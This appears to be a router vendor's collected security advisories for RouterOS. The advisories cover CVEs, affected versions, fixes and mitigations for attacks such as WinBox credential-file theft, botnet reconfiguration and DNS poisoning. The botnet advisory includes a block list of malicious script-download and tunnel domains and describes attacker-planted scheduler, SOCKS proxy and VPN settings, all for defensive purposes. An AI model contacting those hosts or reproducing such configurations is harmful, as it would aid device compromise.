Security

Issue Summary

A vulnerability has been identified in the WinBox service, where a discrepancy in response size between connection attempts with valid and invalid usernames allows attackers to confirm if user accounts exists via brute forcing the login process. In other words, when attacker tries to log into the device, by examining the response, the attacker can deduce if such a user exists on the device. Even if username is found, password still needs to be guessed as well.

Affected Versions

RouterOS versions prior to 6.49.18 and 7.18.

Recommended Actions

Update RouterOS – Upgrade to 6.49.18, 7.18, or a newer version to patch the vulnerability. Monitor for unusual login attempts – Review router logs for suspicious authentication activity and take action accordingly.

Mitigation strategies for devices that cannot be updated immediately

Restrict WinBox Access. Firewall the WinBox port on public interfaces and untrusted networks. Limit connections to trusted IP addresses using the “IP → Services” menu to specify allowed sources (e.g., your LAN and trusted public IPs).

Use additional protection methods if access from untrusted networks is necessary

Port Knocking: https://help.mikrotik.com/docs/spaces/ROS/pages/154042369/Port+knocking

Brute-Force Prevention: https://help.mikrotik.com/docs/spaces/ROS/pages/268337176/Bruteforce+prevention

Secure MAC-WinBox Connections: Restrict MAC-WinBox connections to trusted interfaces using:

/tool mac-server mac-winbox set allowed-interface-list=<trusted-interface-list>

If your device is running the default configuration with firewall enabled, WinBox service is already limited to LAN access. In this case, the only potential attack vector would be internal network threats.

For more details, please see:

https://help.mikrotik.com/docs/spaces/ROS/pages/167706788/Default+configurations

A new CVE has been published, which describes a policy elevation issue, where a logged in administrator with “policy” permissions (able to grant additional permissions to any user on the router), is also able to send crafted configuration commands, that are exchanged internally by the router software components and normally are rejected when sent by a user. This can be used as a stepping stone to execute arbitrary code on the router, allowing the connected user to gain control of the underlying operating system upon which RouterOS runs.

To be able to use this discovered exploit, one would need administrative access to RouterOS, i.e. a known username and password, as well as a ways to connect (no firewall).

This is not the only way how a logged in administrator user with such a high access level (as required for this exploit) can compromise the router. Other possibilities include: saving, modifying and restoring configuration backup; installing additional software packages; using another device on the local network to perform network reinstall of the router to a known vulnerable version.

Thus, if the malicious party has full admin login to a router, this exploit provides little additional advantage. It is extremely important to make sure that the configuration interface of the router is protected by secure password and not accessible to untrusted parties.

Suggested course of action:

• Refrain from giving administrative access to users that are not trustworthy
• Ensure your Firewall settings protect your device from brute-force login attempts
• Utilize RouterOS device-mode feature to further secure critical parts of your device
• Keep RouterOS up to date, use check-for-updates, to make sure you are running the latest RouterOS version

In short, a RouterOS admin with full rights can already do anything in RouterOS and has full control over all configuration, but should not be able to run other code or inject other files in the subsystem of RouterOS. This issue is fixed in all RouterOS releases available on our download page (v7.7 and v6.49.7 and newer).

On 10/05/2023 (May 10th, 2023) MikroTik received information about a new vulnerability, which is assigned the ID CVE-2023-32154. The report stated, that vendor (MikroTik) was contacted in December, but we did not find record of such communication. The original report also says, that vendor was informed in person in an event in Toronto, where MikroTik was not present in any capacity.

What this issue affects: The issue affects devices running MikroTik RouterOS versions v6.xx and v7.xx with enabled IPv6 advertisement receiver functionality. You are only affected if one of the below settings is applied:

ipv6/settings/ set accept-router-advertisements=yes

or

ipv6/settings/set forward=no accept-router-advertisements=yes-if-forwarding-disabled

If the above settings are not set up like in the example, you are not affected. Note that the vulnerable setting combination is not normally found in routers and is rarely used.

What this issue can cause: This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Mikrotik RouterOS. Authentication is not required to exploit this vulnerability.

Recommended course of action: You can disable IPv6 advertisements, or upgrade to RouterOS 7.9.1, 6.49.8, 6.48.7, 7.10beta8 (all versions already released), and of course newer versions afterwards.

In early September 2021 QRATOR labs published an article about a new wave of DDoS attacks, which are originating from a botnet involving MikroTik devices.

As far as we have seen, these attacks use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability, that was quickly patched.

There is no new vulnerability in RouterOS and there is no malware hiding inside the RouterOS filesystem even on the affected devices. The attacker is reconfiguring RouterOS devices for remote access, using commands and features of RouterOS itself.

Unfortunately, closing the old vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create.

We have tried to reach all users of RouterOS about this, but many of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too.

There are no new vulnerabilities in these devices. RouterOS has been recently independently audited by several third parties.

Best course of action:

• Keep your MikroTik device up to date with regular upgrades.
• Do not open access to your device from the internet side to everyone, if you need remote access, only open a secure VPN service, like IPsec.
• Use a strong password and even if you do, change it now!
• Don’t assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
• Inspect your RouterOS configuration for unknown settings (see below).

In collaboration with independent security researchers, we have found that there exists malware that attempts to reconfigure your MikroTik device from a Windows computer inside your network. This is why it’s important to set a better password now (to avoid passwordless login or a dictionary attack by this malware) and to keep your MikroTik router upgraded (since this malware also attempts to exploit the mentioned CVE-2018-14847 vulnerabiliity which has long been fixed).

Configuration to look out for and remove:

• System -> Scheduler rules that execute a Fetch script. Remove these.
• IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
• L2TP client named “lvpn” or any L2TP client that you don’t recognize.
• Input firewall rule that allows access for port 5678.

You can also work with your ISPs to block the following addresses, which these malicious scripts are connecting to:

Block these tunnel endpoint domains:

• *.eeongous.com
  *.leappoach.info
  *.mythtime.xyz

Block these script download domains:

• 1abcnews.xyz
  1awesome.net
  7standby.com
  audiomain.website
  bestony.club
  ciskotik.com
  cloudsond.me
  dartspeak.xyz
  fanmusic.xyz
  gamedate.xyz
  globalmoby.xyz
  hitsmoby.com
  massgames.space
  mobstore.xyz
  motinkon.com
  my1story.xyz
  myfrance.xyz
  phonemus.net
  portgame.website
  senourth.com
  sitestory.xyz
  spacewb.tech
  specialword.xyz
  spgames.site
  strtbiz.site
  takebad1.com
  tryphptoday.com
  wchampmuse.pw
  weirdgames.info
  widechanges.best
  zancetom.com

As reported by others on the internet, these domains are also used by the botnet:

• bestmade.xyz
  gamesone.xyz
  mobigifs.xyz
  myphotos.xyz
  onlinegt.xyz
  picsgifs.xyz

In beginning of May 2021, a security research group from Belgium published a set of vulnerabilities they call “Frag Attacks” (from Fragmentation Attack), which affect all modern security protocols of Wi-Fi. Not all the published issues affect MikroTik products, but those that were found to be potentially affecting RouterOS, have been fixed in all currently released RouterOS versions.

The affected vulnerabilities are: CVE-2020-24587, CVE-2020-24588, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147.

All fixes are published already, in the following versions:

• v6.47.10 [long-term]
• v6.48.3 [stable]
• v7.1beta6 [beta]

The RouterOS package signing procedure has been upgraded, to use new algorithms and utilize state of the art security hardware. It  will also add a possibility to verify the integrity of existing installations.

The new updated package signing procedure provides additional security to prevent installation of malicious software.

Best security practices:

• Keep RouterOS updated to the latest version
• Secure your devices with firewall and limit access to specific services
• Do not use 3rd party sites for RouterOS and other MikroTik software downloads
• Use Netinstall, whenever there is doubt about previous history of software installed on the router, or upgrade router with packages manually downloaded from mikrotik.com

The new updated signing procedure has been implemented in all of the RouterOS release channels starting from:

• 6.47.9 [long-term]
• 6.48.1 [stable]
• 6.49beta11 [testing]
• 7.1beta4 [development]

Summary

Tenable has published a potential vulnerability in older RouterOS versions where an attacker can retrieve the password hash of a RouterOS username via a complex man-in-the-middle attack over port 8291. The attacker must be able to intercept a valid RouterOS user login attempt, so he must be located in the same network as the legitimate user.

Course of action

This issue only affects old RouterOS versions released before June 2019.

1. Using a stong password will ensure the password hash cannot be easily decrypted, even if it is retrieved.
2. MikroTik has already forced the use of Winbox encryption since RouterOS v6.45.x (June 2019).
3. Make sure your device is not accessible from untrusted networks or use a secure VPN to the router, if you must access it from public spaces. Protect your device using our suggestions and use a recent RouterOS release.

Tenable has identified a vulnerability in RouterOS DNS implementation. RouterOS 6.45.6 and below is vulnerable to unauthenticated remote DNS cache poisoning via Winbox. The router is impacted even when DNS is not enabled.

One possible attack vector is via Winbox on port 8291 if this port is open to untrusted networks. The resolver can be reached via Winbox by sending messages to system resolver. If Winbox access is enabled from untrusted networks, an attacker from the internet can trigger a DNS request from the router which allows the attacker to make arbitrary requests, find the router’s internal address (router.lan), or figure out what is already cached.

As usual, we recommend to protect your router administration interface with VPN and firewall.

The issue is fixed in RouterOS versions:

• 6.45.7 [stable]
• 6.44.6 [long-term]
• 6.46beta59 [testing]

With the following changelog entry:

• !) security - fixed improper handling of DNS responses (CVE-2019-3978, CVE-2019-3979);

For more details, please see original report by Jacob Baines (Tenable).

Tenable has identified a couple of issues with RouterOS packaging and upgrade systems. The upgrade system used by RouterOS 6.45.5 and below is vulnerable to man in the middle attacks and insufficient package validation. An attacker can abuse these vulnerabilities to downgrade a router’s installed RouterOS version, possibly lock the user out of the system, possibly disable the system.

• Issue #1: Appending unsigned data to package and directory traversal (CVE-2019-3976). An attacker could create custom packages and give them to the victim, to modify RouterOS directory structure.
• Issue #2: Upgrade is vulnerable to man in the middle attacks (CVE-2019-3977). An attacker could trick the victim to get packages from a different upgrade server.

Both issues are fixed in released RouterOS versions in all release chains:

• 6.45.7 [stable]
• 6.44.6 [long-term]
• 6.46beta59 [testing]

With the following changelog entries:

• !) package - accept only packages with original filenames (CVE-2019-3976);
• !) package - improved package signature verification (CVE-2019-3977);

Summary

Netflix has identified several TCP networking vulnerabilities in the Linux kernel that is used in RouterOS. The vulnerabilities can trigger denial of service if the RouterOS system is attacked from an insufficiently protected network interface (port). Firewall can protect against the issue.

MikroTik has already applied the necessary patches: fix included in RouterOS 6.45.1 and 6.44.5 which is available on our webpage.

Course of action

Make sure your device is not accessible from untrusted networks, protect it using our suggestions and when upgrade files become available, upgrade to latest RouterOS release.

More details

The original article.

Summary

RouterOS contained several IPv6 related resource exhaustion issues, that have now been fixed, taking care of the above-mentioned CVE entries.

The first issue caused the device to reboot if traffic to a lot of different destination addresses was routed. The reboot was caused by watchdog timer since the device was overloaded and stopped responding. After that reboot was fixed, another issue caused the memory to be filled, because IPv6 route cache size could be bigger than the available RAM. This also was fixed, by introducing automatic cache size calculation based on available memory. Both fixes are released already in RouterOS versions that were published April, 2019 (all release chains: RouterOS v6.44.2, RouterOS v6.45beta23 and RouterOS v6.43.14).

Here are the relevant changelog entries:

• ipv6 - fixed soft lockup when forwarding IPv6 packets
• ipv6 - fixed soft lockup when processing large IPv6 Neighbor table
• ipv6 - adjust IPv6 route cache max size based on total RAM memory

Who is affected

By default, the IPv6 functionality in RouterOS is disabled, these systems are not affected. Only people who have manually enabled and configured IPv6 can be affected if their IPv6 address is reachable from untrusted networks.

How to remedy

Upgrade to any RouterOS version released after April 1st, 2019.

Acknowledgements

• CVE-2018-19298, CVE-2018-19299: Marek Isalski

On February 21, Tenable published a new CVE, describing a vulnerability, which allows to proxy a TCP/UDP request through the routers Winbox port, if it’s open to the internet. Tenable had previously contacted MikroTik about this issue, so a fix has already been released on February 11, 2019 in all RouterOS release channels.

The issue does not affect RouterBOARD devices with default configuration, if the “Firewall router” checkbox was left enabled. The issue DOES NOT pose any risk to the router itself, file system is not vulnerable, the issue only allows redirection of connections if port is open. Device itself is safe.

The issue is fixed in:

• 6.43.12 (2019-02-11 14:39)
• 6.44beta75 (2019-02-11 15:26)
• 6.42.12 (2019-02-12 11:46)

As always, MikroTik urges all users to keep their devices up to date, to be protected against all known vulnerabilities and make sure your routers administative ports are firewalled from untrusted networks. The “ip services” menu, where you can protect the “winbox” service, also affects the “dude agent” service, so if you have limited access with this menu, it also protects you from this issue.

A cybersecurity researcher from Tenable Research has released a new proof-of-concept (PoC) RCE attack for an old directory traversal vulnerability that was found and patched within a day of its discovery in April this year, the new attack method found by Tenable Research exploits the same vulnerability, but takes it to one step ahead.

Since the original Winbox issue, identified as CVE-2018-14847, was already patched back in April, we urge all MikroTik users to upgrade their devices to any recently released version, and as a precaution also change their passwords and inspect their configuration for unknown entries.

Please note that all of the recently released CVE entries have been fixed in RouterOS for several months, none of the newly discussed issues affect current products. More information from Tenable. Original post about the fixed issue, later called CVE-2018-14847, including more suggestions.

In short:

• Regardless of version used, all RouterOS versions that have the default firewall enabled, are not vulnerable
• If user has manually disabled the default firewall, their device might be vulnerable to CVE-2018-14847, which was patched in April
• Newly revealed exploit relies on the above, already patched issue
• Please upgrade, change password and inspect configuration for irregularities

MikroTik was contacted by Tenable Inc. who had discovered several issues in RouterOS web server. The issues only affect authenticated users, meaning, to exploit them, there must be a known username and password on the device. Your data, access to the system and configuration are not under risk. All the below issues only allow the authenticated user (even a read-only user) to cause the www service to crash. Tenable has assigned CVE numbers to these issues.

• CVE-2018-1156: An authenticated user can trigger a stack buffer overflow.
• CVE-2018-1157: File upload memory exhaustion. An authenticated user can cause the www binary to consume all memory.
• CVE-2018-1158: Recursive JSON parsing stack exhaustion, which could allow an authenticated user to cause crash of the www service.
• CVE-2018-1159: www memory corruption, if connections are initiated and not properly cleaned up then a heap corruption occurs in www.

All of the above issues are fixed in the following RouterOS releases: 6.42.7, 6.40.9, 6.43

It has come to our attention that a new way of brute force attack based on WPA2 standard using PMKID has come to light.

This attack actually is a brute force attack on WPA2 preshared key. The reason this attack is considered effective is because it can be performed offline, without actually attempting to connect to AP, based on a single sniffed packet from a valid key exchange.

This problem is not a vulnerability, but a way how wireless AP password can be guessed in an easier way.

In order to mitigate this type of attack you should use strong password that is hard to brute force. Using access-list also helps to protect your network, because the attacker needs to be authenticated first.

To eliminate possibility of this attack entirely you can use WPA-PSK (do not forget to use aes-ccm encryption!). WPA-PSK does not include the field that is used to verify the password in this attack.

We have also added the option to disable sending PMKID in handshake message 1 in WPA2-PSK. Disabling it will also protect your network against this attack. This option is available in RouterOS versions 6.40.9, 6.42.7 and 6.43 (from rc56).

This post summarises the Winbox server vulnerability in RouterOS, discovered and fixed in RouterOS on April 23, 2018. Note that although Winbox was used as point of attack, the vulnerabilitty was in RouterOS. This issue was later assigned a universal identifier CVE-2018-14847.

How it works: The vulnerability allowed a special tool to connect to the Winbox port, and request the system user database file.

Versions affected:

• Affected all bugfix releases from 6.30.1 to 6.40.7, fixed in 6.40.8 on 2018-Apr-23
• Affected all current releases from 6.29 to 6.42, fixed in 6.42.1 on 2018-Apr-23
• Affected all RC releases from 6.29rc1 to 6.43rc3, fixed in 6.43rc4 on on 2018-Apr-23

Am I affected? Currently there is no sure way to see if you were affected. If your Winbox port is open to untrusted networks, assume that you are affected and upgrade + change password + add firewall according to our guidelines. Make sure that you change password after an upgrade. The log may show unsuccessful login attempt, followed by a succefful login attempt from unknown IP addresses.

What do do:

1. Upgrade Winbox and RouterOS

2) Change your passwords.

3) Firewall the Winbox port from the public interface, and from untrusted networks. It is best, if you only allow known IP addresses to connect to your router to any services, not just Winbox. We suggest this to become common practice. As an alternative, possibly easier, use the “IP -> Services” menu to specify “Allowed From” addresses. Include your LAN, and the public IP that you will be accessing the device from.

4. Use “Export” command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts.

This post summerizes the facts around the www service vulnerability in RouterOS which was published by Wikileaks as part of the Vault 7 document release. The vulnerability affected the RouterOS webfig configuration interface, if no firewall was put in place to protect it. MikroTik fixed the vulnerability in the following RouterOS releases:

• 6.37.5 in the Bugfix channel
• 6.38.5 in the Current channel

Both were released on 2017-Mar-09.

The vulnerability in question was later exploited by several malicious tools and affected users of RouterOS who had not upgraded RouterOS above the mentioned versions, and had opened the www service port (TCP port 80) to untrusted networks.

VPNfilter

MikroTik was informed by Cisco Talos research group on May 22nd of 2018, that a malicious tool was found on several manufacturer devices, including devices made by MikroTik. We are highly certain that this malware was installed on these devices through the above mentioned vulnerability in the www service.

Simply upgrading RouterOS software deletes the malware, any other 3rd party files and closes the vulnerability. Upgrading RouterOS is done by a few clicks and takes only a minute. To be safe against any kinds of attacks in future, make sure you secure access to your devices.

If you were running a RouterOS version released before March 2017 (6.37.5 in the Bugfix channel, or 6.38.5 in the Current channel) and had allowed access to the device web interface from the internet, we suggest the following steps:

1. Upgrade RouterOS
2. Change your password
3. Protect your device according to our official guide

The name VPNfilter is only a code name of the malware that was found (more specifically, a fake executable name). The modus operandi of this tool has no relation to VPN tunnels.

Hajime botnet

It has come to our attention that a rogue botnet is currently scanning random public IP addresses to find open Winbox (8291) and WWW (80) ports, to exploit the above described vulnerability. Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the “Check for updates” button, if you haven’t done so within the last year.

Your devices are safe if the port 80 is firewalled, or if you have upgraded to v6.38.5 or newer. If you are using our home access point devices with default configuration, they are firewalled from the factory, and you should also be safe, but please upgrade never the less.

FAQ:

What is affected?

- Webfig with standard port 80 and no firewall rules
- Winbox has nothing to do with the vulnerability, Winbox port is only used by the scanners to identify MikroTik brand devices. Then it proceeds to exploit Webfig through port 80.

Am I safe?

- If you upgraded your router in the last ~12 months, you are safe
- If you had “ip service” “www” disabled: you are safe
- If you had firewall configured for port “80”: you are safe
- If you only had Hotspot in your LAN, but Webfig was not available: you are safe. - If you only had User Manager in your LAN, but Webfig was not available: you are safe. - If you had other Winbox port before this: you are safe from the scan, but not from the infection. - If you had “winbox” disabled, you are safe from the scan, not from the infection.

- If you had “ip service” “allowed-from” set to specific network: you are safe if that network was not infected.
- If you had “Webfig” visible to LAN network, you could be infected by an infected device in your LAN.

How to detect and cure?

- Upgrading to v6.38.5 or newer will remove the bad files, stop the infection and prevent anything similar in the future. - If you upgrade device and you still see attempts to access Telnet from your network - run Tool/Torch and find out a source of the traffic. It will not be router itself, but another device in local network which also is affected and requires an upgrade.